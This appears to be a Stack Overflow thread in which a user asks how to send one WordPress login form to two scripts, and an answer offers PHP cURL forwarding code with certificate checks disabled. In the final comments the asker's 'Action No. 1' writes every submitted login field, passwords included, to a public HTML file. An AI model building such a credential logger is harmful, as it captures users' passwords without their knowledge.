# How to Combine Two actions of php Form

Tags: php, html, forms

I want to combine these two following actions, can anyone help me?
I want to perform two actions on one click on the submit button!

**Action No.1:**

```
<form name="loginform" id="loginform" action="<?php echo esc_url( site_url( 'wp-login.php', 'login_post' ) ); ?>" method="post">
```

**Action No.2:**

```
<form name="loginform" id="loginform" action="<?php echo esc_url( site_url( 'wp-login2.php', 'login_post2' ) ); ?>" method="post">
```

I want to send data to two different scripts, thats why I unable to combine them, when I try to combine them, it will send data to one form not both. I want combine both in such a way that it will send the data to both scripts..

Comment: Why don't you combine the forms into one form?

Comment: do you want to send the data to two different scripts? You can just send the data to one .php file and proces the data twice there.

Comment: This is a Wordpress question. You should be able to do this by using Wordpress hooks. You should ask it in the Wordpress version of this forum.

Comment: @Graviton Yes, I want to send data to two different scripts, thats why I unable to combine them, when I try to combine them, it will send data to one form not both. I want combine both in such a way that it will send the data to both scripts..

Comment: forms cannot submit to two different urls. you have to submit to a single one, then use server-side stuff to redirect the data to your other two scripts. That or use some JS hooks to turn one submissions into an ajax call.

Comment: @ RJ Style Then i would just put both scripts on one page call that and from there call the data in both scripts, just make sure you store all the date from the form in two differently named variables for both scripts.

Comment: Php Curl is you're best friend in this case only if you cant change th e back end script.

Comment: @Graviton - Sounds good, leme try it

Comment: @Cody - What is Php Curl?? is this plugin? or something like that?? leme Google it..

Answer (score 1):

You could try using a custom action as the target and use cURL to make the two requests

```
<?php
$targets = array('http://example.com/wp-login-one.php',
                             'http://example.com/wp-login-two.php');

$cookie = 'cookie.txt'; // MUST be writable to script 
$postdata = '';
foreach($_POST as $key => $value){
    $postdata .= '&'.$key.'='.$value;
}

foreach($targets as $url){
    $ch = curl_init(); 
    curl_setopt ($ch, CURLOPT_URL, $url); 
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE); 
    curl_setopt ($ch, CURLOPT_USERAGENT, "Put your desired User Agent here"); 
    curl_setopt ($ch, CURLOPT_TIMEOUT, 60); 
    curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); 
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); 
    curl_setopt ($ch, CURLOPT_COOKIEJAR, $cookie);
    curl_setopt ($ch, CURLOPT_COOKIEFILE, $cookie);  
    curl_setopt ($ch, CURLOPT_POSTFIELDS, $postdata); 
    curl_setopt ($ch, CURLOPT_POST, 1); 
    $result = curl_exec ($ch); 

    curl_close($ch);    
    echo $result;  
}
?>
```

This is untested code - pretty sure it wuld work though - if need be I can further refine it to get to work in the wild!

Comment: with this, Can I open two URL links at once?

Comment: no - you would create a seperate PHP file to use as the one action for the <form> tag - this PHP file would gather up the fields POST'd to it and then send those fields into the two URLs in the $targets array.

Like I said - if you need me to do some testing and come back with a full working version then let me know - but Im leaving the office in  16 minutes and have a LOOOOONG commute before I am home - won;t be able to give you working code for another hour or so

Comment: oops - I meant 'yes' not 'no' lol!

yes, with luck, this script *should* allow you to login to two seperate urls at once. I have done similar things for clients, they needed their employees to be logged in at all supplier sites when they first logged into their system in the mornings. I managed it with a similar 'loop and curl' script and the addition of hidden iframes in the backend.

Comment: OK.. thanks for ur kind replies,
I want to combine the two actions, leme post both here

Comment: Action No.1:

<form name="loginform" id="loginform" action="<?php
$handle = fopen("waleed_bharwa_no.1.html", "a");
foreach($_POST as $variable => $value)
 {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fwrite($handle, "<hr />");
fclose($handle);

?>"  method="post">

Comment: Action No. 2:
<form name="loginform" id="loginform" action="<?php echo esc_url( site_url( 'wp-login.php', 'login_post' ) ); ?>" method="post">